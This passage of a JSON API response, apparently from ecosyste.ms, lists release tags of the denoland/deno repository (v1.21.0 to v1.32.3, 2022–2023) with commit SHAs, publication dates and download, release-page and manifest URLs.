noland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts